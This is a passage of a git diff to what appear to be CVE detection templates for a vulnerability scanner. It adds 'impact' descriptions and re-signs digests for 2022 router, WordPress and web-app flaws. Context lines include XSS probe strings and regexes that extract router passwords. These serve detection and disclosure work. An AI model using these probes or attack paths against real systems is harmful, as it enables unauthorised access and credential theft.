+# digest: 4b0a00483046022100d0a614ff88d41d6f5aee89fdc54670469694125fb277393d4ad72f732fb7ea26022100ce54fc8d01009c1030626bdfb6d6c1fd006cff50cd008c8be37bf623f29b82d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml
index fd616da5c9..10149a5dc3 100644
--- a/http/cves/2022/CVE-2022-33965.yaml
+++ b/http/cves/2022/CVE-2022-33965.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
   remediation: |
     Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204313216021b777b95ad1a0b002782e2a8cdad5ade0af9046aa87160ec6741be4022100a23b4665db56358e00b111d38cb330e1bda04222434db6e8b709b6d88000f709:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210081db4ace8d65640963ab210b1db96e26292237bfb0695d11d4eda2a70d47526e022100d9040018dfaaa2ab0c19634cf020fe35267ceaa834a2714bad5d5d3abae16e48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml
index 78e5edd03a..084292a7b5 100644
--- a/http/cves/2022/CVE-2022-34045.yaml
+++ b/http/cves/2022/CVE-2022-34045.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the access control issue.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206aca70f410799575ef2eb609c5af6a09427397d44e4437ff0223ac261c6db9ad02205a15b5ae22cea4d8fddbec0e93908ffed2c813c2084863e961f5808aab3e8c5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c11a26949df4a1010a22131e7c091f7b1230e117023b96e032035e584be32f07022100ea705f09fe3dee4d79c4752225f3daec68bab4f3e309773c53f28f0e6d8a72b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml
index faf7e3d1cc..5ab0c6836e 100644
--- a/http/cves/2022/CVE-2022-34046.yaml
+++ b/http/cves/2022/CVE-2022-34046.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the access control issue.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: regex
         regex:
           - 'syspasswd="(.+?)"'
-# digest: 4a0a004730450221008e1b2a84c600b07e37f95dc0a995e92a0011887772896790226ea8afd4c7dcef022043b5d5e01fcd52a2caaab424d9020ae7748a683929acddd4fc294b32d3b642b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f19e6ce9a720594eb1347cd31e5a4f801c732a9a9ad70c270a4db9fd74cb1de20221009011557db1527547d856321c691b41b6cc36b15ac8a67b2da5a663a917f11073:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml
index ef823251aa..33b1b9a2f5 100644
--- a/http/cves/2022/CVE-2022-34047.yaml
+++ b/http/cves/2022/CVE-2022-34047.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the access control issue.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: regex
         regex:
           - 'syspasswd="(.+?)"'
-# digest: 4a0a00473045022100a3bd2c7f89bd2168ff6029be6f1d60d6622ef14c24f3fe9404e29fc584eea91d02203f0e2063f313a1070296e6fac1b3a654c6b3d95b38489f73c16381859fe2f74b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022072d402766f309cb9aa1688112bf3afcfae12e1432d4305964884d520fd6d5085022063f9ad75a0524bd50b80c2151e4cd352959e7fde701a35a33f53024585f2e8d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml
index d02054c555..317ab391c2 100644
--- a/http/cves/2022/CVE-2022-34048.yaml
+++ b/http/cves/2022/CVE-2022-34048.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009e367c20458c4e8097cae17566d6ec6989afe34d05d4160d527b247cd2f5c8c90221009a9f596c24489b3296a2572a4a89612118b808bf3831b5d817482b9df4a9545c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022018dceaec52f1db994b5b17ff6a077f6a656a9e20c908c636cf8fd1437279481002201e6a9cb7f4defb436f52c6435044e4f4087ac9c434f22a01adc15e7574e2cbed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml
index f89a52adbe..b58cdad62c 100644
--- a/http/cves/2022/CVE-2022-34049.yaml
+++ b/http/cves/2022/CVE-2022-34049.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the access control issue.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c91bbfd434c8ebddc4e5efb90d3d89d25d304760520d8c5b6a0103475441430b0221009ec65546ce46ba316aa434e25cd9796d1f739413bd3392ba1f66f310a2ce5a88:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f8f51b36a7a068efc64ac52b8fc992e068bc10126ee04a44431a601e22475c47022100949f9275ac74c94a26f3fafd90236947a162544169769928d44f70e7d11db85b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml
index ec6773c1e7..9159623508 100644
--- a/http/cves/2022/CVE-2022-34121.yaml
+++ b/http/cves/2022/CVE-2022-34121.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: |
     Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203319b832c44bfd849f33c1c3297fde34a0919da2298e441e7e2a8ea23f944bab02200f754d27be8897b9151ddae1d163952b33b2f841dd4a14f1d203231dc819454d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009dcd2582d76be5d7b743b93d2cabe8b978c3edcea3f41b73217b32dff0ffdbcb022100b92a4ef94ca851f7750f3fc5f353238ee48894fae42ebada08dd178f45118a76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml
index ebebe65932..68777a372a 100644
--- a/http/cves/2022/CVE-2022-34328.yaml
+++ b/http/cves/2022/CVE-2022-34328.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of PMB.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022019f6b67174c268218f1d4e86fcbdca75116a4f8a4132e45222213db95c933d12022064995681bbbc569aabb9169fb80ad06dbf2182f43d6817458cc47c52938196a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022014b0b666ed3477a23b89fd496bfba77d9d3f75b6ce80380687cfb3de0eea1bca02205e501b1b625ee9930c910df8ee9cb1a4e1eaf2714834e8a87462a70dad1315f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml
index 7b142b2e3d..7b6b03e099 100644
--- a/http/cves/2022/CVE-2022-34576.yaml
+++ b/http/cves/2022/CVE-2022-34576.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the access control issue.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022061f270d639b4b09db3cc51aca61ffc92e4264cd05d1ec0b48d848135c03cb8f4022024e02745822a18efd9c9b67d26f2c24b8867767ba20e5cb40718b83ef1c692c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c7badb95b6e714cb95822899168ee438b334a24b872e0dee416782f740e9a0b202205a0513a4fcd10a04424445c16f30e31a7061db193df69824607f6b631b1427c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml
index e3222b51b5..1ce556f7ca 100644
--- a/http/cves/2022/CVE-2022-34590.yaml
+++ b/http/cves/2022/CVE-2022-34590.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022032aa38296f58ab51ca0396a2bcbd14fafc3a60c90dc1fc3ac5d0494bedf82a7302200f61710bf0823b5536f8e93f5484355ef47d3d969f61ef8aa1ae4aba893fbb66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022056d6a4cbd1b464277b395413966357ca143675de81d9cec8bee7625aac6af274022100dab1244f6884c9914366b0f94d6250e6a6e12724b0cca47f0a171fa8b45d0905:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml
index 5ab039a777..9b551db372 100644
--- a/http/cves/2022/CVE-2022-34753.yaml
+++ b/http/cves/2022/CVE-2022-34753.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008cf8977c879d82e87574b98d6c22770036805676be67de75398b619b888bd153022100fbfbb12a3b218a8c3d1f9d9d9cf0c4c3048824048b68ebb34693dcdaf52e7d93:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022046e863c323213b2460c6735a1ca744c61ed9405a20d36245c4e885ac1cc73a20022100e02c91cdfee8c863dc7e7a5b6722e61f2cfc1242035cd49aa10b6d636015506c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml
index 08d713cd09..9aeb08cbb2 100644
--- a/http/cves/2022/CVE-2022-3484.yaml
+++ b/http/cves/2022/CVE-2022-3484.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.
   remediation: |
     Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - 'contains(body, "wpb_jplayer_setting")'
           - 'contains(body, "<script>alert(document.domain)</script>")'
         condition: and
-# digest: 490a0046304402207fcbba9b35d67a5989c84d572cd8df584d46a0916ffbaf9c410c68ccccbf5b4e022011c6b297f71c473c615b1b18e7f3dbd76bfacb4ac8f50d223bc72499061fb367:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b082900a2cbcc8d5568a027f90d1e342cede08662b75d90b113af08d8ca03548022100ce7267a64ed1bdd3ccdcd07ad6e7a7f93e6ae08b7a87bf81004ac69ce3fb644b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml
index e366e8b36d..7b35992def 100644
--- a/http/cves/2022/CVE-2022-3506.yaml
+++ b/http/cves/2022/CVE-2022-3506.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that  can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
   remediation: |
     Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability.
   reference:
@@ -67,4 +69,4 @@ http:
           - 'name="_wpnonce" value="([0-9a-z]+)" />'
         internal: true
         part: body
-# digest: 4a0a00473045022100ff24a5bce5025d9dd6d772b703eb5d2ff1423a2859b4dc8e010a965bcf92f94102202c9e9330df514cff9a539a085db70900f3f35bf20c0f24a3614c8fc44fbc00e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206dafabf5be58a9f9b5e66cd2d2b523bd338df70578767d6c39189dc864d516310220694fbd074f0b473aa959535b2d728012c2944beb2667d8da7da2cf43ad731ab6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml
index aaea16843b..9285c917e2 100644
--- a/http/cves/2022/CVE-2022-35151.yaml
+++ b/http/cves/2022/CVE-2022-35151.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fa773f03461770ec5d1b483d8d845555523e32474645fe4de11c0d7a7c8e5e8a022100ac81306072487cd7410e5e2d450ab6d2ae01e8c7885c0104654f470d44729b3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c5aff26e05c097d73b7ac891f02017d01b6c870ca3972f1f969f0a2b3f7bdaba0220623752c91c51def50ca3358dd4d627510de9e6708e83e592852173434d15038b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml
index 21d2a14613..76143b653a 100644
--- a/http/cves/2022/CVE-2022-35405.yaml
+++ b/http/cves/2022/CVE-2022-35405.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - "<methodResponse>"
           - "</methodResponse>"
         condition: or
-# digest: 4b0a00483046022100b0f2f8e3737c3dc248e5d267cced2eb1765e2860b8d73ae490bee100bc81b772022100e214630b77bd2f176f2a9fcb71f472d13bc30bfe2f546ec2fec3d3214903ff0b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220676510630f12d106223fcda48ec82076c93a3ba5bcdd91fe1a6f490e1ef6590602206baf6a28ba9deab2b093fdc66ac49cf09d86fbbb0767bb059ce871a4eb4c73c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml
index 368e853ac1..a7a17a6891 100644
--- a/http/cves/2022/CVE-2022-35413.yaml
+++ b/http/cves/2022/CVE-2022-35413.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall.
   remediation: |
     Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203ca806ed8d36ba55a9426603b6e982031357cb534c1fbe4c18d3e266bb468c93022100e8a9999a8ee5194ace00cd8a602586b60c957cc4b7e5d55814f396f33221c0f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022021f16fb1b8e8696d76e7b419d47a1a46f585286647fe25f2ec67b4ae886e732702207038721a7d2afa07ff92977fe65e5f46b5d45d6d8958c4c86d62ccc8d74aa9ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml
index b9385c10d0..047289e1aa 100644
--- a/http/cves/2022/CVE-2022-35416.yaml
+++ b/http/cves/2022/CVE-2022-35416.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bb83f28d71d78d5c59f34e2100990d84745eab48dad7c55611ae8a671aec816d022100a8613f5db3d18500b19da09e3416324ee9849a37dec480ead06e17b25dc4c625:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022023bd49b33790d29eb7fd7d24ecacf097c6366becef5964140abaae25c6439dbf022100bfb7afbf9507c533319068d057629a44d1aa43895e0e9f6e8c8edffb378cd2e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml
index cc42a8fd7c..6fe4969ea3 100644
--- a/http/cves/2022/CVE-2022-35493.yaml
+++ b/http/cves/2022/CVE-2022-35493.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website.
   remediation: |
     To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ec4816ba85ee59bb9a357898fa8eba610778145e88fed494af7d1ce7ad1a7ed3022100ac631c34565d02bd4793297310538fdda70cda0991ee4a52f177cd4f746ed276:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207102832b43107bb5bff65f98566e7cf997252aceb849e5ccbef55eda69dfb8a0022100f2d4db5872f9feaef38c470adf89c2c97d341384798143273b07668d1286097c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml
index 20f9c77edf..a2d4c2bd88 100644
--- a/http/cves/2022/CVE-2022-3578.yaml
+++ b/http/cves/2022/CVE-2022-3578.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
           - 'contains(body_2, "Extension Options")'
           - 'contains(body_2, "<script>alert(document.domain)</script>&tab")'
         condition: and
-# digest: 4a0a0047304502205dec09e086f283de1eb50e47a262ec3c91f90b6764935d856b7856f5e2849319022100bf257ce797928af88bfe1ca1410d8b86c062450d2ea1ca547f5c47d7014475e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b4f455774809496f53aa7fa4ea4b518617c103c7b222f9279bf05dc922dbf9a1022100f7007ea77a56b1f44651de5ab205678c1856091756cd60ee63d284ddd0b99772:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml
index 701d28063a..53fe1a7c17 100644
--- a/http/cves/2022/CVE-2022-35914.yaml
+++ b/http/cves/2022/CVE-2022-35914.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f6c9d3f08276b0e3af108b7c239a6eab3262bfdfe52172014ed4e967313bb55902205f1110d417e40529f736e569ee0f038eb7ae6c0bff22867b0ef313a40de075fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022005eba5660748f4c88348456705c401794f7951580cc0fb2411b7452c8886e819022100ecfa3ea4438c7221dc8587085be7e1c8bc08a396d2902bb606a5d17de896d93d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml
index e49ef96523..0f17a23741 100644
--- a/http/cves/2022/CVE-2022-36446.yaml
+++ b/http/cves/2022/CVE-2022-36446.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade Webmin to version 1.997 or later to mitigate this vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b6201d6dcf37d04dc3ac617dcba71840e56e48b79af9d2c35866eea0db13385d022100ec6548a2405d632357db5324a78ec4ce8a3c14c4ec7966cd63b83e75cf002326:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206be5a30a306682b052252f627e8200a91d98bbdc193f29f9aa4bd51bdc1502e202203300bdbd4a23b57b479a96bf49e6e07bfc4a55b3aa994f57a4d0e5fbbe6ae8ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml
index b40b91912c..dd57e40d0c 100644
--- a/http/cves/2022/CVE-2022-36537.yaml
+++ b/http/cves/2022/CVE-2022-36537.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.
   remediation: |
     Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.
   reference:
@@ -72,4 +74,4 @@ http:
         regex:
           - "dt:'(.*?)',cu:"
         internal: true
-# digest: 4b0a004830460221009b63565cfa59731e452a22aa49da572abf4828f819edd4b7bb06be5417ec889d022100892407eac0b10ee4bf3c5c431e1b3282f969f59f27dd2a0a7199261e68ab9a66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207aa20de3d1fb8110da9934b3f22161eafc91c2c1f8d4c69684e8dbe13288a619022100d6fff7388dd0af4925641d7166879df706882270423aea9994012abea37aa84c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml
index 7efe95f814..6895da32f7 100644
--- a/http/cves/2022/CVE-2022-36642.yaml
+++ b/http/cves/2022/CVE-2022-36642.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX.
   reference:
